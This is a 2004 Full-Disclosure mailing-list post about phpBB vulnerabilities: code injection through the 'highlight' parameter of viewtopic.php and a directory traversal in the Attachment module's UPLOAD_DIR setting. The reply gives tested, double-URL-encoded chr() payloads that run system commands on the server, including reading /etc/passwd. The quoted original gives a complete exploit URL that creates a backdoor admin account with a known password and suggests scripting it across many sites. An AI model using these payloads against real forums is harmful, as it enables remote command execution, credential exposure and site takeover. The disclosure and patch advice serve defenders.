Instead of just injecting mysql commands you can use system(); to virtually execute any command you want.
here's some examples i've already tested : system(ls -l); -------------- %2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)) %252echr(59)%252e%2527 system(uname -a); ----------------- %2527%252esystem(chr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101) %252echr(32)%252echr(45)%252echr(97))%252echr(59)%252e%2527 system(id); ----------- %2527%252esystem(chr(105)%252echr(100))%252echr(59)%252e%2527 system(/bin/cat /etc/passwd); ----------------------------- %2527%252esystem(chr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%2 52echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(101)%252 echr(116)%252echr(99)%252echr(47)%252echr(112)%252echr(97)%252echr(115)%252e chr(115)%252echr(119)%252echr(100))%252echr(59)%252e%2527 with the wrong permissions set someone exploiting this vulnerability would be able to overwrite anything. ----- Original Message ----- From: <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Friday, November 26, 2004 2:23 PM Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal > Phpbb: All vulnerable all except 2.0.11 > Attachment module: All version vulnerable > > Howdark update opened wide my eyes with his nice exploit: > > Bugtraq id: 10701 > > ----- > viewtopic.php?t=1&highlight=%2527 > ----- > > Looking at the code I saw that was possible inject any type of Sql query > with a multiple char() functions. > > The following code can add an username with admin rights executing this > query: > > INSERT INTO > phpbb_users(user_id,user_active,username,user_password,user_level) VALUES > ('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1') > > And will be added to phpbb_users a new user with admin rights. > > *Note we can only execute a working query if we know the tables name. If not > we can't. So this work only with a standard installation (usually 95% of > websites ;-) > > username: ze3lock > pass: thepass > > The exploit can be run without being logged in and then you can have access > with username. So it's quite simple to make it part of a script that could > make backdoors around the web. > > For make it working just use the id of a working thread (in this case the > thread is 30 - you can see it from the message) > > --- Code start ---- > > http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr > (73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32) > %252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25 > 2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252 > echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25 > 2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2 > 52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2 > 52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2 > 52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)% > 252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)% > 252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)% > 252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44) > %252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108 > )%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr( 32 > )%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)% 25 > 2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech > r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39 > )%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(10 8) > %252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2 > 52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec > hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr > (102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98 > )%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)% 25 > 2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec > hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr( > 41))%252e%2527 > > --- code end --- > > ------------ Attach Module ---------------- > > > In the attach module, I found a directory traversal in the "UPLOAD_DIR" > field. > > This is the directory where all attachments are supposted to be uploaded. > > The field accept any kind of character so you can put instead of 'files' > '../../' and all the attachments will be uploaded in the '../..? directory. > > That's really dangerous for defacements threat. > > > --------------- Suggestion ------------------ > > Please, upgrade to version 2.0.11 and add an input validation to UPLOAD_DIR > field in attach module. > > Zeelock > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html